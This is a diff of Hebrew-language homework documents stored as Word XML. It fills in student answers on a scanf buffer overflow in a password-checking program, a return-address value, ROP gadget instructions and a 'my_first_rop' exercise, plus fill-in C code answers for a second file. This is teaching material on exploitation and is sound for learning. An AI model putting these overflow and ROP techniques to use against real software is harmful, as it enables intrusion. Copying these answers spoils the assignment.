-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>scanf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>    scanf(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5185,42 +4793,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>checkPassword</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(password</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>)){</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>(checkPassword(password)){</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5242,32 +4816,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>        printf(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5395,32 +4945,8 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-          <w:lang w:eastAsia="en-IL"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>    printf(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5566,7 +5092,6 @@
         </w:rPr>
         <w:t xml:space="preserve">הסבירו בקצרה מה הבעיה בקריאה של התוכנית ל </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5577,7 +5102,6 @@
         </w:rPr>
         <w:t>scanf</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5608,13 +5132,24 @@
         <w:spacing w:line="480" w:lineRule="auto"/>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
           <w:rFonts w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">מפני שאין הגבלה על כמות התווים שהמשתמש יכול להכניס, כל </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5625,7 +5160,43 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>מפני שאין הגבלה על כמות התווים שהמשתמש יכול להכניס, כל תו שהמשתמש יכניס מעבר ל-16 התווים ש-</w:t>
+        <w:t>ה</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>תו</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>וים</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:hint="cs"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שהמשתמש יכניס מעבר ל-16 התווים ש-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5883,7 +5454,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> או להשתמש ב־</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5894,7 +5464,6 @@
         </w:rPr>
         <w:t>gdb</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5926,13 +5495,36 @@
         <w:spacing w:line="480" w:lineRule="auto"/>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
           <w:rFonts w:cs="Arial" w:hint="cs"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+          <w:highlight w:val="yellow"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">הפקודה </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cs="Arial"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ret</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5943,7 +5535,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">הפקודה </w:t>
+        <w:t xml:space="preserve"> תקפוץ לכתובת </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5954,41 +5546,7 @@
           <w:highlight w:val="yellow"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>ret</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial" w:hint="cs"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> תקפוץ לכתובת </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>0</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cs="Arial"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:highlight w:val="yellow"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>x6f69636f64696c61</w:t>
+        <w:t>0x6f69636f64696c61</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6229,7 +5787,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> להיעזר ב </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6240,7 +5797,6 @@
         </w:rPr>
         <w:t>objdump</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6530,20 +6086,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>op %</w:t>
+              <w:t>op %rdi</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>rdi</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6708,20 +6252,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>pop %</w:t>
+              <w:t>pop %rax</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>rax</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6824,20 +6356,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>op %</w:t>
+              <w:t>op %rsi</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>rsi</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6979,9 +6499,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>dd %r15, %</w:t>
+              <w:t>dd %r15, %r</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6990,7 +6509,7 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>r</w:t>
+              <w:t>d</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7000,19 +6519,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>d</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
               <w:t>i</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -7125,10 +6633,11 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>ush %</w:t>
+              <w:t>ush %rbp</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7136,12 +6645,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>rbp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            </w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7149,7 +6654,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>m</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7158,9 +6664,11 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>m</w:t>
+              <w:t>ov %rsp, %rbp</w:t>
             </w:r>
-            <w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7168,9 +6676,7 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>ov %</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7179,9 +6685,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>rsp</w:t>
+              <w:t>c</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7190,9 +6695,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>, %</w:t>
+              <w:t xml:space="preserve">all </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -7201,12 +6705,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>rbp</w:t>
+              <w:t>*</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -7214,59 +6715,8 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>c</w:t>
+              <w:t>%rax</w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">all </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>*</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>%</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Strong"/>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
-                <w:b w:val="0"/>
-                <w:bCs w:val="0"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>rax</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -7413,21 +6863,8 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">צרפו צילום מסך של ערך היציאה. לכתיבת ערכים </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>בינארים</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>צרפו צילום מסך של ערך היציאה. לכתיבת ערכים בינארים</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7458,20 +6895,8 @@
           <w:bCs w:val="0"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>xHH</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>\xHH</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7927,7 +7352,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7938,7 +7362,6 @@
         </w:rPr>
         <w:t>my_first_rop</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -7991,31 +7414,7 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>אוקטלי</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Strong"/>
-          <w:rFonts w:cstheme="minorHAnsi"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:rtl/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>) תחת התיקייה הנוכחית. הניחו שלא קיים קובץ או תיקייה בשם זה תחת התיקייה הנוכחית ושיש הרשאות ליצור תיקייה זו. אין חש</w:t>
+        <w:t xml:space="preserve"> (אוקטלי) תחת התיקייה הנוכחית. הניחו שלא קיים קובץ או תיקייה בשם זה תחת התיקייה הנוכחית ושיש הרשאות ליצור תיקייה זו. אין חש</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8039,7 +7438,6 @@
         </w:rPr>
         <w:t>בות לדרך היציאה מהתוכנית ואין חשיבות לפלט שמודפס לגבי נכונות הסיסמה. בפרט, זה בסדר שהתוכנית תסתיים כתוצאה מ</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8050,7 +7448,6 @@
         </w:rPr>
         <w:t>segfault</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -8682,6 +8079,7 @@
     <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
@@ -8728,8 +8126,10 @@
     <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
     <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
     <w:lsdException w:name="Light Shading" w:uiPriority="60"/>

--- a/hw3/hw3_dry/HW3-Dry.docx
+++ b/hw3/hw3_dry/HW3-Dry.docx
@@ -3516,7 +3516,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>_______</w:t>
+        <w:t>s != NULL</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3594,7 +3594,17 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> x = *s -</w:t>
+        <w:t xml:space="preserve"> x = *s </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>–</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3604,7 +3614,17 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ______</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>'a'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3662,7 +3682,37 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(x&gt;</w:t>
+        <w:t>(x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3672,7 +3722,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>____</w:t>
+        <w:t>25</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3856,7 +3906,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">(y &gt; </w:t>
+        <w:t>(y &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3866,7 +3916,17 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>_____</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>~(x)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4030,7 +4090,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve">         y = </w:t>
+        <w:t>         y =</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4040,7 +4100,7 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>__________</w:t>
+        <w:t xml:space="preserve"> 26y + *s</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4174,7 +4234,7 @@
           <w:szCs w:val="21"/>
